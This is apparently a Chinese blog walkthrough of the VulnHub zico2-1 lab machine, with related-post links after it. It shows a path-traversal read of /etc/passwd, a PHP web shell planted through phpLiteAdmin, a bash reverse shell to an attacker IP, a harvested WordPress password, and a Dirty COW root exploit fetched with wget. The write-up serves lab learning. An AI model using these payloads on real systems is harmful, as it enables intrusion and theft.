vulnhub渗透日记15:zico2-1

最新推荐文章于 2024-07-23 15:37:29 发布
最新推荐文章于 2024-07-23 15:37:29 发布
阅读量93 收藏
点赞数
分类专栏: Vulnhub靶机渗透日记 文章标签: web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ericalezl/article/details/131995266
版权

前言

⏰时间:2023.7.29
🗺️靶机地址:https://www.vulnhub.com/entry/zico2-1,210/
⚠️文中涉及操作均在靶机模拟环境中完成,切勿未经授权用于真实环境。
🙏本人水平有限,如有错误望指正,感谢您的查阅!
🎉欢迎关注🔍点赞👍收藏⭐️留言📝

信息收集

nmap发现主机

┌──(root㉿kali)-[~]
└─# nmap -sn 192.168.58.1/24             
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-29 10:02 HKT
Nmap scan report for 192.168.58.1
Host is up (0.00029s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.58.2
Host is up (0.00013s latency).
MAC Address: 00:50:56:EB:56:98 (VMware)
Nmap scan report for 192.168.58.162
Host is up (0.00024s latency).
MAC Address: 00:0C:29:70:7C:17 (VMware)

目标是192.168.58.162
设置目标为变量
masscan快速发现端口

┌──(root㉿kali)-[~]
└─# export T=192.168.58.162
                                                                                                       
┌──(root㉿kali)-[~]
└─# masscan  --rate=100000 -p 1-65535 $T            
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2023-07-29 02:04:23 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 111/tcp on 192.168.58.162                                 
Discovered open port 80/tcp on 192.168.58.162                                  
Discovered open port 22/tcp on 192.168.58.162                                  
Discovered open port 48546/tcp on 192.168.58.162

nmap进一步探测

──(root㉿kali)-[~]
└─# nmap -A -p 22,80,111,48546 $T
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-29 10:06 HKT
Nmap scan report for 192.168.58.162
Host is up (0.00025s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)
|   2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)
|_  256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)
80/tcp    open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Zico's Shop
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          39109/tcp6  status
|   100024  1          45393/udp   status
|   100024  1          47475/udp6  status
|_  100024  1          48546/tcp   status
48546/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:70:7C:17 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

为方便操作,将80端口网站添加hosts

echo '192.168.58.162 t' | tee -a /etc/hosts

访问t:80即可

在这里插入图片描述使用awvs扫描
发现存在文件包含
在这里插入图片描述

┌──(root㉿kali)-[~]
└─# curl http://t/view.php?page=../../../../../../../../../../../../../../etc/passwd                 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
ntp:x:103:108::/home/ntp:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
statd:x:105:65534::/var/lib/nfs:/bin/false
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
zico:x:1000:1000:,,,:/home/zico:/bin/bash

而且还扫出来个phpliteadmin登录口
在这里插入图片描述在这里插入图片描述

phpLiteadmin写shell

直接admin登录
在这里插入图片描述在create new database下输入haha.php,点击create即创建
点击change database下面的haha.php,即切换到haha.php
创建表
在这里插入图片描述default value中写入:

<?php system($_GET[cmd]);?>

在这里插入图片描述在这里插入图片描述然后到insert里面点击insert
在这里插入图片描述在这里插入图片描述
即可执行命令在这里插入图片描述

反弹shell

不支持nc -e
在这里插入图片描述用bash反弹shell

bash -c 'bash -i >& /dev/tcp/192.168.58.153/5555 0>&1'

url编码一下
在这里插入图片描述在这里插入图片描述

进入zico

看下home目录
在这里插入图片描述发现wordpress下的wp-config.php,拿到密码
在这里插入图片描述sWfCsfJSPV9H3AmQzw8,尝试切换到zico用户
需要先用python开启稳定shell才能su切换用户

python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

dirtycow提权

脚本地址:https://www.exploit-db.com/exploits/40839

uname -a
cd /tmp
wget http://192.168.58.153:3333/dirty.c
gcc -pthread dirty.c -o exp -lcrypt
chmod 777 exp
./exp 123456
su firefart
ls /root
cat /root/flag.txt

在这里插入图片描述

_WHOAM1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
(Vulnhub练习)-- Zico2渗透实战
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
09-21 456
(Vulnhub练习)-- Zico2渗透实战 Zico2渗透实战 下载地址 http://www.vulnhub.com/entry/zico2-1,210/ 此文章是参照大佬橘子女侠的文章写的 以下为我跟着他的文章整理的笔记 主机发现 sudo netdiscover -i eth0 -r 192.168.100.0/24 目标主机IP:192.168.100.153 端口扫描 sudo nmap -A 192.168.100.153 指纹识别 whatweb 192.168.100.153
靶机渗透——Zico
1匹黑马
02-21 632
文章目录任务环境信息收集漏洞挖掘漏洞利用获得权限权限提升 任务环境 攻击机:Kali2019 靶机:zico 涉及知识点:目录遍历、文件包含、数据库插马拿shell、脏牛提权 信息收集 获取靶机的IP地址以及端口服务信息 开放了22、80、111端口,接着扫一下Web目录 这里发现了一个类似于数据库管理的页面,这里就是我们的切入点了。 漏洞挖掘 先用owasp-zap扫一下 这里...
靶场渗透(五)——zico2渗透
Ramona的博客
08-10 586
测试环境 靶机:cizo2打开虚拟机后设为nat模式 攻击机:kali,windows10 信息收集 • nmap扫描ip,端口和服务,根据扫描结果可得 ip:192.168.111.138 端口及服务:22 ssh;80 http;111 渗透测试 • 访问网站,查看源码也没发现有价值的线索,爆破目录发现了敏感目录dbadmin且存在遍历漏洞 • 访问test_d...
Zico2 渗透测试
Darklord.W
04-11 607
Zico2 渗透测试 0x00实验环境 靶机:zico2,IP地址:192.168.8.202 测试机:Kali,IP地址:192.168.8.145; 0x01实验流程 信息收集——主机发现、端口扫描 渗透测试 0x02实验步骤 netdiscover主机发现 Masscan以及nmap扫描 首先进行masscan扫描 接下来nmap扫描 对服务漏洞进行搜索 ...
靶机渗透测试实战(六)——Zico2渗透实战
橘子女侠
05-11 6732
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (一)信息收集——主机发现 1. 查看Kali的IP信息;(IP:192.168.37.131) 2. 扫描主机(netdiscover) (二)信息收集——端口扫描 1. 扫描端口(masscan) 2. 详细扫描端口信息(nmap) (三)渗透测试 80端口(http服务) 1. 访问目标靶机的80端口 ...
VulnHub渗透测试实战靶场 - ZICO2: 1
LYJ20010728的博客
08-07 675
VulnHub渗透测试实战靶场 - ZICO2: 1环境下载ZICO2: 1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权补充 环境下载 戳此进行环境下载 ZICO2: 1靶机搭建 具体步骤参考VirtualBox(Host only)和VMware共用同一虚拟网卡 将下载好的靶机环境,导入VritualBox,设置为Host-Only模式 将VMware中桥接模式网卡设置为VritualBox的Host-only 渗透测试 信息搜集 先用arp-scan扫描一下网段内目标靶机的IP地址
VULNHUB靶机渗透——ZICO2:1
aarong的博客
12-15 1071
渗透测试中使用的工具有Arp-scan(获取IP)、Nmap(获取目标开放端口和服务信息)、Dirb(网站目录爆破工具)、Zap(漏洞扫描工具)、在线密文破解工具等等。 \1) arp-scan扫描 NAT模式下,arp-scan扫描出靶机的IP:192.168.65.134 \2) Nmap扫描 获取开放端口及服务的全部信息 浏览器打开开启的网站 界面如下,是一个网络购物平台的网站。 \3) Dirb爆破 命令:dirb http://192.168.65.134 爆破结果发现类似于数
【甄选靶场】Vulnhub百个项目渗透——项目二十八:zico2-1(目录遍历,sqlite数据库写入,脏牛提权)
人间体佐菲的博客
10-01 768
【甄选靶场】Vulnhub百个项目渗透——项目二十八:zico2-1(目录遍历,sqlite数据库写入,脏牛提权) 信息安全,网络安全渗透测试
靶机综合渗透环境(zico2手册).pdf
04-07
靶机综合渗透环境——zico2渗透实战
VMware的Zico2虚拟机
05-12
1. 快速部署:由于Zico2已经预先安装好操作系统并进行了必要的配置,用户可以节省大量的安装和设置时间。 2. 隔离环境:每个虚拟机都是独立的,互不影响,适合进行软件测试、实验或隔离不同项目的工作空间。 3. 资源...
Acme-2zicon:Acme-2zicon 的只读发布历史
07-02
名称Acme::2zicon - 这是新的 $module概要 use Acme::2zicon;my $nizicon = Acme::2zicon->new;# retrieve the members on their activitiesmy @members = $nizicon->members;...Creates and returns a new Acme::2zico
Zico-Shop.xmind
11-25
Zico-Shop.xmind
Zoomla!逐浪CMS2 x3.9.6.zip
07-16
15、增加:手机端专用编辑器,已用于贴吧(支持文字|表情|图片上传) 16、优化:扩展-备份还原数据UI体验,支持目录从根显示 17、增加:标签解析调试模块,用于分析标签解析效率 18、扩展:内容评论使用新编辑器,支持...
微软蓝屏”事件暴露了网络安全哪些问题?
2301_79339087的博客
07-23 1456
微软蓝屏事件不仅暴露了软件更新中的问题,更是一次对全球网络安全和系统稳定性的严峻考验。通过加强风险管理、质量控制、冗余设计和应急响应,我们可以在未来减少类似事件的发生,提高整体网络安全水平。各行业应加强合作,信息共享,共同提升应对重大系统故障的能力,构建更加稳固和安全的网络环境。在未来,我们需要更加关注软件更新过程中的风险管理和质量控制,通过引入更多的自动化工具和流程,提高测试的覆盖率和效率,确保软件的安全性和稳定性。
网络安全-华为华三交换机防火墙日志解析示例
最新发布
PanDD_0_1的博客
07-23 340
华为交换机日志解析示例。
网站验证:确保网络安全与信任的重要步骤
07-22 309
在数字时代,网站验证是确保网络安全和建立用户信任的关键措施。随着网络诈骗和恶意软件的日益增多,验证网站的真实性和安全性变得尤为重要。本文将探讨网站验证的重要性、常见的验证方法以及如何通过验证提升用户体验和网站信誉。
“微软蓝屏”事件暴露了网络安全哪些问题?
csdn_aspnet的专栏
07-23 1223
这次由微软系统软件更新引发的“微软蓝屏”事件,无疑是对全球IT基础设施韧性与安全性的重大考验。850万台设备的故障,以及对航空、医疗和传媒等关键行业的广泛影响,再次突显出我们在网络安全和系统稳定性方面的脆弱性。一、问题解析1、更新管理的复杂性:随着技术的不断进步,软件更新的复杂性也在增加。大型系统中,需要兼顾各种硬件、软件和环境,确保更新不会引发兼容性问题,而这往往十分困难。2、供应链风险:如这次事件所示,一个小小的缺陷就可能通过供应链扩散,造成全球性影响。
网络安全常见错误及解决办法(更新中)
qq_42041946的博客
07-22 490
设置一下wwwtest访问权限做负载均衡使用火狐浏览器访问一直访问一个页面,使用谷歌就正常两个也轮换,是火狐浏览器的问题在nginx的配置文件里改站点根目录,但是网页报了403 Forbidden,重安装了个centos也不行强制刷新过了,改回相对路径html才可以。答:403就是没有权限 再/web这个文件夹下chown -R nginx:nginx .(如果不行就看看你的selinux 有没有关闭,vim /etc/selinux/config 看看是不是disabled。
Zico2靶机渗透测试实战指南
"该文档是关于使用Zico2作为靶机进行渗透测试的实战指南,主要涵盖实验环境的设置、信息收集以及渗透测试的步骤。Zico2是一个用于安全研究和教育的虚拟机,适用于练习渗透测试技术。" 在渗透测试领域,Zico2靶机...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值